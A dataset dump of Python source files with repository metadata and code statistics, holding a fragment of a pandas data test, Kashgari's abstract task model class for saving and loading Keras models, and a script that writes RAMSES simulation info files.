assert df.index.name == 'date'
assert (df.index >= str(start_date)).all()
assert (df.index <= str(end_date + dt.timedelta(days=1))).all()
assert set(required_keys) == set(required_keys).intersection(df.columns)
assert (df['segment_id'] == segment_id).all()
# 2. Check stored data
df_local = pd.read_csv(tmp_path, parse_dates=["date"], index_col="date")
from ast import literal_eval
df_local.car_speed_hist_0to70plus = df_local.car_speed_hist_0to70plus.apply(literal_eval)
df_local.car_speed_hist_0to120plus = df_local.car_speed_hist_0to120plus.apply(literal_eval)
assert (df_local == df).all().all()
| 33.166667 | 95 | 0.725712 | 351 | 2,388 | 4.692308 | 0.327635 | 0.03643 | 0.024287 | 0.03643 | 0.173042 | 0.110504 | 0.03643 | 0 | 0 | 0 | 0 | 0.045132 | 0.174204 | 2,388 | 71 | 96 | 33.633803 | 0.790061 | 0.130235 | 0 | 0.04 | 0 | 0 | 0.048839 | 0 | 0 | 0 | 0 | 0 | 0.22 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a47a619909d8c68e7ff3f55a7292b76dc36728b | 4,544 | py | Python | kashgari/tasks/abs_task_model.py | SharpKoi/Kashgari | ef8c4b4d17dbd69616b9cc744489181909e313c3 | [
"Apache-2.0"
] | null | null | null | kashgari/tasks/abs_task_model.py | SharpKoi/Kashgari | ef8c4b4d17dbd69616b9cc744489181909e313c3 | [
"Apache-2.0"
] | null | null | null | kashgari/tasks/abs_task_model.py | SharpKoi/Kashgari | ef8c4b4d17dbd69616b9cc744489181909e313c3 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
# author: BrikerMan
# contact: eliyar917@gmail.com
# blog: https://eliyar.biz
# file: abs_task_model.py
# time: 1:43 下午
import json
import os
import pathlib
from abc import ABC, abstractmethod
from typing import Dict, Any, TYPE_CHECKING, Union
import tensorflow as tf
import kashgari
from kashgari.embeddings import ABCEmbedding
from kashgari.logger import logger
from kashgari.processors.abc_processor import ABCProcessor
from kashgari.utils import load_data_object
from kashgari.layers import KConditionalRandomField
if TYPE_CHECKING:
from kashgari.tasks.labeling import ABCLabelingModel
from kashgari.tasks.classification import ABCClassificationModel
class ABCTaskModel(ABC):
def __init__(self) -> None:
self.tf_model: tf.keras.Model = None
self.embedding: ABCEmbedding = None
self.hyper_parameters: Dict[str, Any]
self.sequence_length: int
self.text_processor: ABCProcessor
self.label_processor: ABCProcessor
def to_dict(self) -> Dict[str, Any]:
model_json_str = self.tf_model.to_json()
return {
'tf_version': tf.__version__, # type: ignore
'kashgari_version': kashgari.__version__,
'__class_name__': self.__class__.__name__,
'__module__': self.__class__.__module__,
'config': {
'hyper_parameters': self.hyper_parameters, # type: ignore
'sequence_length': self.sequence_length # type: ignore
},
'embedding': self.embedding.to_dict(), # type: ignore
'text_processor': self.text_processor.to_dict(),
'label_processor': self.label_processor.to_dict(),
'tf_model': json.loads(model_json_str)
}
@classmethod
def default_hyper_parameters(cls) -> Dict[str, Dict[str, Any]]:
"""
The default hyper parameters of the model dict, **all models must implement this function.**
You could easily change model's hyper-parameters.
For example, change the LSTM unit in BiLSTM_Model from 128 to 32.
>>> from kashgari.tasks.classification import BiLSTM_Model
>>> hyper = BiLSTM_Model.default_hyper_parameters()
>>> print(hyper)
{'layer_bi_lstm': {'units': 128, 'return_sequences': False}, 'layer_output': {}}
>>> hyper['layer_bi_lstm']['units'] = 32
>>> model = BiLSTM_Model(hyper_parameters=hyper)
Returns:
hyper params dict
"""
raise NotImplementedError
def save(self, model_path: str, encoding='utf-8') -> str:
pathlib.Path(model_path).mkdir(exist_ok=True, parents=True)
model_path = os.path.abspath(model_path)
with open(os.path.join(model_path, 'model_config.json'), 'w', encoding=encoding) as f:
f.write(json.dumps(self.to_dict(), indent=2, ensure_ascii=False))
f.close()
self.embedding.embed_model.save_weights(os.path.join(model_path, 'embed_model_weights.h5'))
self.tf_model.save_weights(os.path.join(model_path, 'model_weights.h5')) # type: ignore
logger.info('model saved to {}'.format(os.path.abspath(model_path)))
return model_path
@classmethod
def load_model(cls, model_path: str, encoding='utf-8') -> Union["ABCLabelingModel", "ABCClassificationModel"]:
model_config_path = os.path.join(model_path, 'model_config.json')
model_config = json.loads(open(model_config_path, 'r', encoding=encoding).read())
model = load_data_object(model_config)
model.embedding = load_data_object(model_config['embedding'])
model.text_processor = load_data_object(model_config['text_processor'])
model.label_processor = load_data_object(model_config['label_processor'])
tf_model_str = json.dumps(model_config['tf_model'])
model.tf_model = tf.keras.models.model_from_json(tf_model_str,
custom_objects=kashgari.custom_objects)
if isinstance(model.tf_model.layers[-1], KConditionalRandomField):
model.crf_layer = model.tf_model.layers[-1]
model.tf_model.load_weights(os.path.join(model_path, 'model_weights.h5'))
model.embedding.embed_model.load_weights(os.path.join(model_path, 'embed_model_weights.h5'))
return model
@abstractmethod
def build_model(self,
x_data: Any,
y_data: Any) -> None:
raise NotImplementedError
| 38.184874 | 114 | 0.665493 | 551 | 4,544 | 5.205082 | 0.274047 | 0.040795 | 0.020921 | 0.031381 | 0.222455 | 0.135983 | 0.095537 | 0.095537 | 0.059275 | 0.031381 | 0 | 0.007426 | 0.229533 | 4,544 | 118 | 115 | 38.508475 | 0.811768 | 0.166813 | 0 | 0.054795 | 0 | 0 | 0.09695 | 0.017974 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082192 | false | 0 | 0.191781 | 0 | 0.328767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a47bdd4053aca36705ed4d58e60c21aacfb2da2 | 1,915 | py | Python | pyram/utils/make_info_from_amr.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z | pyram/utils/make_info_from_amr.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 6 | 2020-02-17T13:44:43.000Z | 2020-06-25T15:35:05.000Z | pyram/utils/make_info_from_amr.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z |
# coding: utf-8
def write_info(amr):
#import fortranformat as ff
#nout = amr.nout
aexp = amr.aexp
h0 = amr.h0 * 1e-2
rhoc = 1.88e-29
boxlen = 1.0
f = open("info_" + str(nout).zfill(5) + ".txt", 'w')
for name, val in zip(["ncpu", "ndim", "levelmin", "levelmax", "ngridmax", "nstep_coarse"],
[amr.ncpu, amr.ndim, levelmin, amr.nlevelmax, amr.ngridmax, amr.nstep_coarse]):
f.write("{:<12s}={:11d} \n".format(name, val))
f.write("\n")
#lineformat = ff.FortranRecordWriter('(1E23.15)')
scale_d = amr.Om * rhoc * h0**2 / aexp**3
scale_t = aexp**2 / (h0*1e5/3.08e24)
scale_l = aexp* amr.boxlen * 3.08e24/(h0)
for name, val in zip(["boxlen", "time", "aexp", "H0", "omega_m", "omega_l", "omega_k", "omega_b",
"unit_l", "unit_d", "unit_t"],
[boxlen, amr.t, aexp, h0, amr.Om, amr.Ol, amr.Ok, amr.Ob, scale_l, scale_d, scale_t]):
f.write("{:<12s}={:.15E} \n".format(name,val))
f.write("\n")
f.write("ordering type=" + ah.ordering[0].decode("UTF-8"))
f.write("\n DOMAIN ind_min ind_max \n")
for i in range(amr.ncpu):
f.write("{:8d} {:.15E} {:.15E}\n".format(i+1, amr.bound_key[i],amr.bound_key[i+1]))
f.close()
"""
This can generate 'header' of info.
But it is not trivial to read 128-bit floating point (QUADHILBERT) numbers from binary bits in Python.
Instead, I used a fortran program to read amr.00001 and output hilbert keys in the info format.
"""
wdir = "./"
from pyram import load
nouts = range(113, 120)
for nout in nouts:
ah = load.sim.AmrHeader()
snout = str(nout).zfill(5)
ah._read_amr_header(open(wdir + "output_"+snout+"/amr_"+snout+".out00001", 'rb'), skip_header=False)
levelmin = 8 # From other info file
write_info(ah)
| 31.393443 | 111 | 0.565535 | 289 | 1,915 | 3.650519 | 0.449827 | 0.03981 | 0.019905 | 0.024645 | 0.068246 | 0.03981 | 0.03981 | 0 | 0 | 0 | 0 | 0.053408 | 0.256919 | 1,915 | 60 | 112 | 31.916667 | 0.687983 | 0.06423 | 0 | 0.0625 | 0 | 0 | 0.178687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.03125 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |